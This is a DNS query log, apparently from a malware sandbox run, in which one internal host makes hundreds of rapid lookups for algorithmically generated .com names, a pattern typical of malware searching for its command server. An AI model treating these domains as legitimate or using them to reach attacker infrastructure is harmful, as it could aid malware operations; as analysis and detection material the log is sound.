Aug 23, 2024 18:47:48.777041912 CEST	192.168.2.4	1.1.1.1	0xe09	Standard query (0)	lygyjan.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.777198076 CEST	192.168.2.4	1.1.1.1	0xe80c	Standard query (0)	vowybyc.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.777339935 CEST	192.168.2.4	1.1.1.1	0xe718	Standard query (0)	qexytil.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.777621984 CEST	192.168.2.4	1.1.1.1	0x2ee2	Standard query (0)	pufyjag.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.777908087 CEST	192.168.2.4	1.1.1.1	0x91f8	Standard query (0)	gaqyvys.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.778331041 CEST	192.168.2.4	1.1.1.1	0x601d	Standard query (0)	lyxytur.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.779006958 CEST	192.168.2.4	1.1.1.1	0xce57	Standard query (0)	vofyjom.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.779366016 CEST	192.168.2.4	1.1.1.1	0x8c9d	Standard query (0)	qeqyvev.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.779788017 CEST	192.168.2.4	1.1.1.1	0xb7dc	Standard query (0)	puzytul.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.780311108 CEST	192.168.2.4	1.1.1.1	0xa351	Standard query (0)	gadyhoh.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.780651093 CEST	192.168.2.4	1.1.1.1	0x1bab	Standard query (0)	lymyved.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.780792952 CEST	192.168.2.4	1.1.1.1	0xdea	Standard query (0)	volyrut.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.781002045 CEST	192.168.2.4	1.1.1.1	0xa367	Standard query (0)	qedyhiq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.781198025 CEST	192.168.2.4	1.1.1.1	0xe81d	Standard query (0)	pumycav.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.781388998 CEST	192.168.2.4	1.1.1.1	0xf921	Standard query (0)	galyryz.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.781620979 CEST	192.168.2.4	1.1.1.1	0xd212	Standard query (0)	qekyryp.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.781620979 CEST	192.168.2.4	1.1.1.1	0xeeb6	Standard query (0)	lysygij.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.781811953 CEST	192.168.2.4	1.1.1.1	0x5734	Standard query (0)	vonycaf.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.782308102 CEST	192.168.2.4	1.1.1.1	0x6b42	Standard query (0)	pupyguq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.782326937 CEST	192.168.2.4	1.1.1.1	0xfaa5	Standard query (0)	ganycob.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.782505035 CEST	192.168.2.4	1.1.1.1	0xdbb9	Standard query (0)	lykywex.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.782649994 CEST	192.168.2.4	1.1.1.1	0xe9b4	Standard query (0)	vopyguk.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.782813072 CEST	192.168.2.4	1.1.1.1	0xeb8e	Standard query (0)	vojykyf.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.949002028 CEST	192.168.2.4	1.1.1.1	0xcf5d	Standard query (0)	qebyxog.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.949605942 CEST	192.168.2.4	1.1.1.1	0x14c7	Standard query (0)	pujywep.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.950565100 CEST	192.168.2.4	1.1.1.1	0x3664	Standard query (0)	gatyfuw.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.951314926 CEST	192.168.2.4	1.1.1.1	0xa4c8	Standard query (0)	lyvyxin.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.952009916 CEST	192.168.2.4	1.1.1.1	0xa2fc	Standard query (0)	vojyqac.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.952671051 CEST	192.168.2.4	1.1.1.1	0xb413	Standard query (0)	qetyfyl.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.953289032 CEST	192.168.2.4	1.1.1.1	0x1692	Standard query (0)	puvyxig.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.954134941 CEST	192.168.2.4	1.1.1.1	0x4101	Standard query (0)	gahyqas.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.954788923 CEST	192.168.2.4	1.1.1.1	0x7cb2	Standard query (0)	lyryfyr.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.955319881 CEST	192.168.2.4	1.1.1.1	0xee7e	Standard query (0)	vocyzum.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.956000090 CEST	192.168.2.4	1.1.1.1	0x2f75	Standard query (0)	qegyqov.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.956612110 CEST	192.168.2.4	1.1.1.1	0x4c68	Standard query (0)	purydel.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.957181931 CEST	192.168.2.4	1.1.1.1	0xfed2	Standard query (0)	gacyzuh.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.957495928 CEST	192.168.2.4	1.1.1.1	0x13c8	Standard query (0)	lygymod.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.957858086 CEST	192.168.2.4	1.1.1.1	0xf62	Standard query (0)	vowydet.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.958198071 CEST	192.168.2.4	1.1.1.1	0x39a2	Standard query (0)	qexyluq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.958504915 CEST	192.168.2.4	1.1.1.1	0xabc	Standard query (0)	pufymiv.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.958556890 CEST	192.168.2.4	1.1.1.1	0xd9fc	Standard query (0)	gaqydaz.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.959089994 CEST	192.168.2.4	1.1.1.1	0x5ac6	Standard query (0)	lyxylyj.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.959460020 CEST	192.168.2.4	1.1.1.1	0xcaa9	Standard query (0)	qeqysap.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.959742069 CEST	192.168.2.4	1.1.1.1	0x7625	Standard query (0)	puzylyq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.960091114 CEST	192.168.2.4	1.1.1.1	0x5df7	Standard query (0)	gadynub.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.960392952 CEST	192.168.2.4	1.1.1.1	0x9a8c	Standard query (0)	lymysox.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.960921049 CEST	192.168.2.4	1.1.1.1	0xffaf	Standard query (0)	volykek.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.960958958 CEST	192.168.2.4	1.1.1.1	0x5d0d	Standard query (0)	qedynug.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.961649895 CEST	192.168.2.4	1.1.1.1	0x8287	Standard query (0)	lysynun.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.961910963 CEST	192.168.2.4	1.1.1.1	0xd937	Standard query (0)	galykew.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.962023020 CEST	192.168.2.4	1.1.1.1	0x8a7	Standard query (0)	vonypic.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.962491035 CEST	192.168.2.4	1.1.1.1	0xcfa2	Standard query (0)	pumypop.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.962867975 CEST	192.168.2.4	1.1.1.1	0xdc63	Standard query (0)	qekykal.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.962887049 CEST	192.168.2.4	1.1.1.1	0x1a7d	Standard query (0)	pupybyg.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.963443041 CEST	192.168.2.4	1.1.1.1	0x6f25	Standard query (0)	ganypis.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.963726044 CEST	192.168.2.4	1.1.1.1	0x1946	Standard query (0)	vopybym.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.963758945 CEST	192.168.2.4	1.1.1.1	0xa19a	Standard query (0)	lykyjar.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.964360952 CEST	192.168.2.4	1.1.1.1	0x43f5	Standard query (0)	qebytuv.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.964999914 CEST	192.168.2.4	1.1.1.1	0x226d	Standard query (0)	pujyjol.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.965142012 CEST	192.168.2.4	1.1.1.1	0x77be	Standard query (0)	gatyveh.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.965738058 CEST	192.168.2.4	1.1.1.1	0x464b	Standard query (0)	vojyjot.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.966201067 CEST	192.168.2.4	1.1.1.1	0xb445	Standard query (0)	puvytuv.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.966346025 CEST	192.168.2.4	1.1.1.1	0x856d	Standard query (0)	qetyveq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.966787100 CEST	192.168.2.4	1.1.1.1	0x1a47	Standard query (0)	lyvytud.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.967387915 CEST	192.168.2.4	1.1.1.1	0x88c0	Standard query (0)	gahyhiz.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.967741013 CEST	192.168.2.4	1.1.1.1	0x74c7	Standard query (0)	lyryvaj.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.968585968 CEST	192.168.2.4	1.1.1.1	0x5f23	Standard query (0)	vocyryf.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.972105026 CEST	192.168.2.4	1.1.1.1	0x4fcb	Standard query (0)	vofymif.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.972373009 CEST	192.168.2.4	1.1.1.1	0x4242	Standard query (0)	qegyhip.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.972531080 CEST	192.168.2.4	1.1.1.1	0x192b	Standard query (0)	purycaq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.972687960 CEST	192.168.2.4	1.1.1.1	0x231f	Standard query (0)	gacyryb.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.972909927 CEST	192.168.2.4	1.1.1.1	0x2ec2	Standard query (0)	lygygux.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.973041058 CEST	192.168.2.4	1.1.1.1	0xdd20	Standard query (0)	vowycok.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.973187923 CEST	192.168.2.4	1.1.1.1	0x5e11	Standard query (0)	qexyreg.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.973326921 CEST	192.168.2.4	1.1.1.1	0x79ea	Standard query (0)	pufygup.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.973462105 CEST	192.168.2.4	1.1.1.1	0x4771	Standard query (0)	gaqycow.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.973586082 CEST	192.168.2.4	1.1.1.1	0x9003	Standard query (0)	lyxywen.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.973789930 CEST	192.168.2.4	1.1.1.1	0xf9ef	Standard query (0)	vofyguc.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.973975897 CEST	192.168.2.4	1.1.1.1	0x119c	Standard query (0)	qeqyxil.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.974117041 CEST	192.168.2.4	1.1.1.1	0x3b9	Standard query (0)	puzywag.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.974263906 CEST	192.168.2.4	1.1.1.1	0x34a	Standard query (0)	gadyfys.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.974407911 CEST	192.168.2.4	1.1.1.1	0x8139	Standard query (0)	lymyxir.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.974549055 CEST	192.168.2.4	1.1.1.1	0x47b9	Standard query (0)	qedyfyv.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.975440025 CEST	192.168.2.4	1.1.1.1	0x86f3	Standard query (0)	pumyxul.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.975718975 CEST	192.168.2.4	1.1.1.1	0x7e8a	Standard query (0)	volyqam.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.976146936 CEST	192.168.2.4	1.1.1.1	0xbb13	Standard query (0)	galyqoh.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.976511955 CEST	192.168.2.4	1.1.1.1	0xf49f	Standard query (0)	lysyfed.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:49.200262070 CEST	192.168.2.4	1.1.1.1	0x2d9a	Standard query (0)	gahyhiz.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:49.949608088 CEST	192.168.2.4	1.1.1.1	0x2142	Standard query (0)	vonyzut.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:49.950603008 CEST	192.168.2.4	1.1.1.1	0x3933	Standard query (0)	qekyqoq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:49.951076031 CEST	192.168.2.4	1.1.1.1	0x3c91	Standard query (0)	pupydev.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:49.951270103 CEST	192.168.2.4	1.1.1.1	0x9223	Standard query (0)	ganyzuz.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:49.951514959 CEST	192.168.2.4	1.1.1.1	0x7a82	Standard query (0)	lykymij.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:49.951873064 CEST	192.168.2.4	1.1.1.1	0x3ce8	Standard query (0)	vopydaf.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:49.952397108 CEST	192.168.2.4	1.1.1.1	0x7098	Standard query (0)	pujymiq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:49.952439070 CEST	192.168.2.4	1.1.1.1	0x2cc3	Standard query (0)	qebylyp.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:49.952972889 CEST	192.168.2.4	1.1.1.1	0xa7c0	Standard query (0)	gatydab.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:49.953021049 CEST	192.168.2.4	1.1.1.1	0x680c	Standard query (0)	lyvylyx.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:49.953521967 CEST	192.168.2.4	1.1.1.1	0xad57	Standard query (0)	vojymuk.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:49.953836918 CEST	192.168.2.4	1.1.1.1	0xf3e7	Standard query (0)	puvylep.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:49.954293966 CEST	192.168.2.4	1.1.1.1	0x9a7b	Standard query (0)	gahynuw.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:49.954729080 CEST	192.168.2.4	1.1.1.1	0x766f	Standard query (0)	lyryson.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:49.955136061 CEST	192.168.2.4	1.1.1.1	0x8534	Standard query (0)	vocykec.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:49.955168962 CEST	192.168.2.4	1.1.1.1	0xf6d6	Standard query (0)	qegynul.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:49.955737114 CEST	192.168.2.4	1.1.1.1	0xec45	Standard query (0)	purypig.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:49.955826044 CEST	192.168.2.4	1.1.1.1	0xea7f	Standard query (0)	gacykas.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:49.956258059 CEST	192.168.2.4	1.1.1.1	0x325f	Standard query (0)	vowypim.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:49.956258059 CEST	192.168.2.4	1.1.1.1	0x10d7	Standard query (0)	lygynyr.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:49.956723928 CEST	192.168.2.4	1.1.1.1	0x8ca2	Standard query (0)	qexykav.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:49.956989050 CEST	192.168.2.4	1.1.1.1	0xe8e6	Standard query (0)	pufybyl.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:49.957094908 CEST	192.168.2.4	1.1.1.1	0x7b2c	Standard query (0)	gaqypuh.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:49.957623959 CEST	192.168.2.4	1.1.1.1	0x2364	Standard query (0)	lyxyjod.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:49.957660913 CEST	192.168.2.4	1.1.1.1	0xf1aa	Standard query (0)	vofybet.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:49.958123922 CEST	192.168.2.4	1.1.1.1	0x7784	Standard query (0)	qeqytuq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:49.958550930 CEST	192.168.2.4	1.1.1.1	0x77ae	Standard query (0)	puzyjov.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:49.958601952 CEST	192.168.2.4	1.1.1.1	0xd2cf	Standard query (0)	gadyvez.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:49.959253073 CEST	192.168.2.4	1.1.1.1	0xf5b4	Standard query (0)	lymytuj.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:49.959569931 CEST	192.168.2.4	1.1.1.1	0x3e27	Standard query (0)	volyjif.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:49.959821939 CEST	192.168.2.4	1.1.1.1	0xbd96	Standard query (0)	qedyvap.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:49.959922075 CEST	192.168.2.4	1.1.1.1	0x75f7	Standard query (0)	pumytyq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:49.960673094 CEST	192.168.2.4	1.1.1.1	0x3c9d	Standard query (0)	galyhib.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:49.961249113 CEST	192.168.2.4	1.1.1.1	0xc512	Standard query (0)	lysyvax.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:49.961597919 CEST	192.168.2.4	1.1.1.1	0xcd7c	Standard query (0)	vonyryk.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:49.961663008 CEST	192.168.2.4	1.1.1.1	0x765d	Standard query (0)	qekyhug.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:49.962866068 CEST	192.168.2.4	1.1.1.1	0xee4f	Standard query (0)	qetysog.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:49.963558912 CEST	192.168.2.4	1.1.1.1	0x5ee	Standard query (0)	pupycop.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:49.963957071 CEST	192.168.2.4	1.1.1.1	0x28de	Standard query (0)	ganyrew.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:49.964076996 CEST	192.168.2.4	1.1.1.1	0x75f2	Standard query (0)	lykygun.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:49.966433048 CEST	192.168.2.4	1.1.1.1	0xc69b	Standard query (0)	qebyrel.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:49.966466904 CEST	192.168.2.4	1.1.1.1	0xad6b	Standard query (0)	pujygug.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:49.966850042 CEST	192.168.2.4	1.1.1.1	0x86b	Standard query (0)	vopycoc.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:49.968441010 CEST	192.168.2.4	1.1.1.1	0xbdb7	Standard query (0)	gatycis.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:49.968756914 CEST	192.168.2.4	1.1.1.1	0x832a	Standard query (0)	lyvywar.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:49.970088005 CEST	192.168.2.4	1.1.1.1	0x8bb2	Standard query (0)	vojygym.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:49.971486092 CEST	192.168.2.4	1.1.1.1	0xaba9	Standard query (0)	puvywal.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:49.972112894 CEST	192.168.2.4	1.1.1.1	0xe829	Standard query (0)	vocyqot.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:49.972151041 CEST	192.168.2.4	1.1.1.1	0x244	Standard query (0)	lyryxud.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:49.972475052 CEST	192.168.2.4	1.1.1.1	0xfa0a	Standard query (0)	puryxuv.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:49.972544909 CEST	192.168.2.4	1.1.1.1	0xd6ce	Standard query (0)	gahyfyh.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:49.973742008 CEST	192.168.2.4	1.1.1.1	0x11f4	Standard query (0)	gacyqoz.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:49.974190950 CEST	192.168.2.4	1.1.1.1	0xe846	Standard query (0)	qegyfeq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:49.974318981 CEST	192.168.2.4	1.1.1.1	0x44b0	Standard query (0)	lygyfej.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:49.974603891 CEST	192.168.2.4	1.1.1.1	0x5308	Standard query (0)	qetyxiv.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:49.974811077 CEST	192.168.2.4	1.1.1.1	0x44cd	Standard query (0)	vowyzuf.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:49.974915028 CEST	192.168.2.4	1.1.1.1	0xa42e	Standard query (0)	qexyqip.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:49.975128889 CEST	192.168.2.4	1.1.1.1	0xa87c	Standard query (0)	pufydaq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:49.975300074 CEST	192.168.2.4	1.1.1.1	0xb20d	Standard query (0)	gaqyzyb.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:49.975451946 CEST	192.168.2.4	1.1.1.1	0x6a62	Standard query (0)	vofydak.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:49.975574017 CEST	192.168.2.4	1.1.1.1	0xc41	Standard query (0)	lyxymix.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:49.975720882 CEST	192.168.2.4	1.1.1.1	0x9358	Standard query (0)	puzymup.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:49.975928068 CEST	192.168.2.4	1.1.1.1	0xd2db	Standard query (0)	gadydow.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:49.976047993 CEST	192.168.2.4	1.1.1.1	0xdb39	Standard query (0)	qeqylyg.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:50.143668890 CEST	192.168.2.4	1.1.1.1	0x15ab	Standard query (0)	lymylen.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:50.144246101 CEST	192.168.2.4	1.1.1.1	0xc851	Standard query (0)	volymuc.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:50.144831896 CEST	192.168.2.4	1.1.1.1	0xf76c	Standard query (0)	qedysol.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:50.145436049 CEST	192.168.2.4	1.1.1.1	0xb358	Standard query (0)	pumyleg.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:50.145895958 CEST	192.168.2.4	1.1.1.1	0x5c5a	Standard query (0)	galynus.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:50.146543026 CEST	192.168.2.4	1.1.1.1	0x2ca8	Standard query (0)	qekynyv.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:50.146686077 CEST	192.168.2.4	1.1.1.1	0x203b	Standard query (0)	lysysir.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:50.146791935 CEST	192.168.2.4	1.1.1.1	0x1152	Standard query (0)	vonykam.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:50.147330046 CEST	192.168.2.4	1.1.1.1	0x4fc2	Standard query (0)	pupypil.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:50.147438049 CEST	192.168.2.4	1.1.1.1	0xb469	Standard query (0)	ganykah.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:50.147830963 CEST	192.168.2.4	1.1.1.1	0x1505	Standard query (0)	lykynyd.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:50.148267031 CEST	192.168.2.4	1.1.1.1	0xf5b8	Standard query (0)	qebykoq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:50.148453951 CEST	192.168.2.4	1.1.1.1	0x437d	Standard query (0)	vopyput.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:50.148837090 CEST	192.168.2.4	1.1.1.1	0xb660	Standard query (0)	pujybev.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:50.148895025 CEST	192.168.2.4	1.1.1.1	0x5997	Standard query (0)	gatypuz.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:50.150585890 CEST	192.168.2.4	1.1.1.1	0x2085	Standard query (0)	lyvyjoj.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:50.150585890 CEST	192.168.2.4	1.1.1.1	0xd2db	Standard query (0)	vojybef.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:50.150818110 CEST	192.168.2.4	1.1.1.1	0x9877	Standard query (0)	qetytup.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:50.152854919 CEST	192.168.2.4	1.1.1.1	0x6fc1	Standard query (0)	gahyvab.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:50.152915001 CEST	192.168.2.4	1.1.1.1	0x4636	Standard query (0)	purytyp.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:50.153014898 CEST	192.168.2.4	1.1.1.1	0x1f39	Standard query (0)	vocyjik.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:50.153153896 CEST	192.168.2.4	1.1.1.1	0x23ba	Standard query (0)	puvyjiq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:50.153153896 CEST	192.168.2.4	1.1.1.1	0x18e5	Standard query (0)	lyrytyx.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:50.153320074 CEST	192.168.2.4	1.1.1.1	0x8980	Standard query (0)	qegyvag.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:50.153320074 CEST	192.168.2.4	1.1.1.1	0x6f2c	Standard query (0)	gacyhuw.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:50.153685093 CEST	192.168.2.4	1.1.1.1	0xfc27	Standard query (0)	vowyrec.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:50.153685093 CEST	192.168.2.4	1.1.1.1	0x3b51	Standard query (0)	lygyvon.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:50.154021025 CEST	192.168.2.4	1.1.1.1	0x7f12	Standard query (0)	qexyhul.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:50.154021025 CEST	192.168.2.4	1.1.1.1	0xd4f4	Standard query (0)	gaqyres.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:50.154098034 CEST	192.168.2.4	1.1.1.1	0x698	Standard query (0)	pufycog.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:50.154412031 CEST	192.168.2.4	1.1.1.1	0x69af	Standard query (0)	lyxygur.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:50.154560089 CEST	192.168.2.4	1.1.1.1	0x24c2	Standard query (0)	puzygyl.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:50.154840946 CEST	192.168.2.4	1.1.1.1	0x3f03	Standard query (0)	qeqyrav.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:50.154915094 CEST	192.168.2.4	1.1.1.1	0x5b45	Standard query (0)	vofycim.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:50.155168056 CEST	192.168.2.4	1.1.1.1	0x6ab1	Standard query (0)	gadycih.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:50.155354023 CEST	192.168.2.4	1.1.1.1	0xf2af	Standard query (0)	lymywad.com	A (IP address)	IN (0x0001)	false
